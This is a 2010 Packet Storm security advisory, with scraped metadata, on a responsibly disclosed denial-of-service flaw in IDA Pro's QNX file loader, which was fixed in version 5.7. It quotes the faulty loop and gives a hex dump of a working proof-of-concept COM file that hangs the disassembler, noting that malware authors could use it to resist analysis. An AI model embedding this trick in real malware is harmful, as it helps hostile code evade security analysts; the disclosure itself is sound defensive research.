ID PACKETSTORM:91234 Type packetstorm Reporter Jason Geffner Modified 2010-06-29T00:00:00
Description
`Denial-of-Service Vulnerability in IDA Pro
------------------------------------------
June 28th, 2010
=======
Summary
=======
Name: Denial-of-Service Vulnerability in IDA Pro
Release Date: June 28th, 2010
Discoverer: Jason Geffner
Version Affected: IDA Pro 3.76 through 5.6
Risk: Low
Status: Published
============
Introduction
============
This paper discusses how a binary file could be crafted to cause IDA Pro to
consume 100% of CPU resources while trying to analyze it, thus preventing
disassembling. While this vulnerability is in the QNX file loader, a functional
COM file could be crafted to masquerade as a QNX file and trigger this issue.
This vulnerability was responsibly disclosed to IDA Pro's support personnel and
this advisory was not released until a fixed build was publicly released.
==========
Background
==========
"The IDA Pro Disassembler and Debugger is an interactive, programmable,
extendible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.
IDA Pro has become the de-facto standard for the analysis of hostile code,
vulnerability research and COTS validation." [1]
========
Timeline
========
07/28/98 IDA Pro loader for QNX files written
12/31/09 Denial-of-service vulnerability discovered in IDA Pro loader for QNX
files
12/31/09 Detailed vulnerability report responsibly disclosed to IDA Pro's
support personnel
01/04/10 Response received from IDA Pro's support personnel, confirming
vulnerability
06/25/10 IDA Pro 5.7 released, fixing vulnerability
06/28/10 Advisory released
=============
Vulnerability
=============
IDA Pro uses different file loaders to disassemble files of different formats
(PE, ELF, etc.). The loader for QNX files contains a vulnerability that allows
a specially crafted file to cause the loader to go into an infinite loop,
thereby consuming 100% of CPU resources and preventing disassembly.
The for-loop below is designed to iterate through each lmf_data structure in
the input file, advancing the file pointer based on sizeof(lmf_data) +
lmf_data.offset). However, if lmf_data.offset == -sizeof(lmf_data) then at is
never increased and this code will run in an infinite loop.
>From \ldr\qnx\qnx.cpp(50):
for(uint32 at = sizeof(ex.lmf_header)+ex.lmf_header.data_nbytes;
lmf_data.segment_index != _LMF_EOF_REC;
at += sizeof(lmf_data) + lmf_data.offset)
{
qlseek( li, at, 0 );
if ( sizeof(_lmf_data) !=
qlread( li, &lmf_data, sizeof(_lmf_data) ) ) return 0;
switch(lmf_data.segment_index)
{
...
case _LMF_COMMENT_REC:
break;
...
}
}
=======
Exploit
=======
While this vulnerability is in the QNX file loader, a functional COM file could
be crafted to masquerade as a QNX file and trigger this issue. As such, it
would be possible for a malware author to create a working malicious COM
program, craft it to appear as a QNX file to IDA Pro, and thus prevent IDA Pro
from being able to disassemble it. Windows 7 will correctly run such a COM
program even if it is named with a .EXE extension.
See below for a proof-of-concept COM file. When run from a command-prompt, this
program will print, "I can't be opened in IDA Pro :)". When opened in IDA Pro,
it will cause IDA Pro to spin in an infinite loop.
00000000: 00 00 34 00 00 00 b4 09 eb 02 82 01 ba 13 01 cd ..4.............
00000010: 21 cd 20 49 20 63 61 6e 27 74 20 62 65 20 6f 70 !. I can't be op
00000020: 65 6e 65 64 20 69 6e 20 49 44 41 20 50 72 6f 20 ened in IDA Pro
00000030: 3a 29 24 00 00 00 00 00 00 00 01 00 fa ff ff ff :)$.............
00000040: 00 00 00 00 00 00 ......
==========
Conclusion
==========
In-depth code reviews and fuzzing should be performed on all software,
especially when the software is designed for analyzing malicious and/or
untrusted data.
===============
Fix Information
===============
This issue has now been resolved. IDA Pro 5.7 can be downloaded from
https://www.hex-rays.com/updida.shtml
==========
References
==========
[1] http://hex-rays.com/idapro/overview.htm
NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070
`
{"edition": 1, "title": "IDA Pro Denial Of Service", "bulletinFamily": "exploit", "published": "2010-06-29T00:00:00", "lastseen": "2016-11-03T10:29:38", "history": [], "modified": "2010-06-29T00:00:00", "reporter": "Jason Geffner", "hash": "1c213d5e820a4cfeb15c6fc56115380dceb6fb36e8352dbb17a71cbd38d2a66e", "sourceHref": "https://packetstormsecurity.com/files/download/91234/idapro-dos.txt", "viewCount": 0, "href": "https://packetstormsecurity.com/files/91234/IDA-Pro-Denial-Of-Service.html", "description": "", "type": "packetstorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "8246e4eee60e3c349c662712a5eae62b"}, {"key": "modified", "hash": "9e960b5f93a3adbffcac9c151ec569bb"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "9e960b5f93a3adbffcac9c151ec569bb"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "affbe6c7066b52820ade14c45ba2fb18"}, {"key": "sourceData", "hash": "4e7d9f20ab2845c25afed7ea1c29983e"}, {"key": "sourceHref", "hash": "1d659b3dd0236bc35d1460400a5e28eb"}, {"key": "title", "hash": "dd3276299ba443da73cdbccdd28cfe71"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:29:38"}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:38"}, "vulnersScore": -0.2}, "sourceData": "`Denial-of-Service Vulnerability in IDA Pro \n------------------------------------------ \n \nJune 28th, 2010 \n \n======= \nSummary \n======= \nName: Denial-of-Service Vulnerability in IDA Pro \nRelease Date: June 28th, 2010 \nDiscoverer: Jason Geffner \nVersion Affected: IDA Pro 3.76 through 5.6 \nRisk: Low \nStatus: Published \n \n============ \nIntroduction \n============ \nThis paper discusses how a binary file could be crafted to cause IDA Pro to \nconsume 100% of CPU resources while trying to analyze it, thus preventing \ndisassembling. While this vulnerability is in the QNX file loader, a functional \nCOM file could be crafted to masquerade as a QNX file and trigger this issue. \nThis vulnerability was responsibly disclosed to IDA Pro's support personnel and \nthis advisory was not released until a fixed build was publicly released. \n \n========== \nBackground \n========== \n\"The IDA Pro Disassembler and Debugger is an interactive, programmable, \nextendible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X. \nIDA Pro has become the de-facto standard for the analysis of hostile code, \nvulnerability research and COTS validation.\" [1] \n \n======== \nTimeline \n======== \n07/28/98 IDA Pro loader for QNX files written \n12/31/09 Denial-of-service vulnerability discovered in IDA Pro loader for QNX \nfiles \n12/31/09 Detailed vulnerability report responsibly disclosed to IDA Pro's \nsupport personnel \n01/04/10 Response received from IDA Pro's support personnel, confirming \nvulnerability \n06/25/10 IDA Pro 5.7 released, fixing vulnerability \n06/28/10 Advisory released \n \n============= \nVulnerability \n============= \nIDA Pro uses different file loaders to disassemble files of different formats \n(PE, ELF, etc.). The loader for QNX files contains a vulnerability that allows \na specially crafted file to cause the loader to go into an infinite loop, \nthereby consuming 100% of CPU resources and preventing disassembly. \n \nThe for-loop below is designed to iterate through each lmf_data structure in \nthe input file, advancing the file pointer based on sizeof(lmf_data) + \nlmf_data.offset). However, if lmf_data.offset == -sizeof(lmf_data) then at is \nnever increased and this code will run in an infinite loop. \n \n>From \\ldr\\qnx\\qnx.cpp(50): \nfor(uint32 at = sizeof(ex.lmf_header)+ex.lmf_header.data_nbytes; \nlmf_data.segment_index != _LMF_EOF_REC; \nat += sizeof(lmf_data) + lmf_data.offset) \n{ \nqlseek( li, at, 0 ); \nif ( sizeof(_lmf_data) != \nqlread( li, &lmf_data, sizeof(_lmf_data) ) ) return 0; \nswitch(lmf_data.segment_index) \n{ \n... \ncase _LMF_COMMENT_REC: \nbreak; \n... \n} \n} \n \n======= \nExploit \n======= \nWhile this vulnerability is in the QNX file loader, a functional COM file could \nbe crafted to masquerade as a QNX file and trigger this issue. As such, it \nwould be possible for a malware author to create a working malicious COM \nprogram, craft it to appear as a QNX file to IDA Pro, and thus prevent IDA Pro \nfrom being able to disassemble it. Windows 7 will correctly run such a COM \nprogram even if it is named with a .EXE extension. \n \nSee below for a proof-of-concept COM file. When run from a command-prompt, this \nprogram will print, \"I can't be opened in IDA Pro :)\". When opened in IDA Pro, \nit will cause IDA Pro to spin in an infinite loop. \n \n00000000: 00 00 34 00 00 00 b4 09 eb 02 82 01 ba 13 01 cd ..4............. \n00000010: 21 cd 20 49 20 63 61 6e 27 74 20 62 65 20 6f 70 !. I can't be op \n00000020: 65 6e 65 64 20 69 6e 20 49 44 41 20 50 72 6f 20 ened in IDA Pro \n00000030: 3a 29 24 00 00 00 00 00 00 00 01 00 fa ff ff ff :)$............. \n00000040: 00 00 00 00 00 00 ...... \n \n========== \nConclusion \n========== \nIn-depth code reviews and fuzzing should be performed on all software, \nespecially when the software is designed for analyzing malicious and/or \nuntrusted data. \n \n=============== \nFix Information \n=============== \nThis issue has now been resolved. IDA Pro 5.7 can be downloaded from \nhttps://www.hex-rays.com/updida.shtml \n \n========== \nReferences \n========== \n[1] http://hex-rays.com/idapro/overview.htm \n \nNGSSoftware Insight Security Research \nhttp://www.ngssoftware.com/ \nhttp://www.databasesecurity.com/ \nhttp://www.nextgenss.com/ \n+44(0)208 401 0070 \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "id": "PACKETSTORM:91234"}
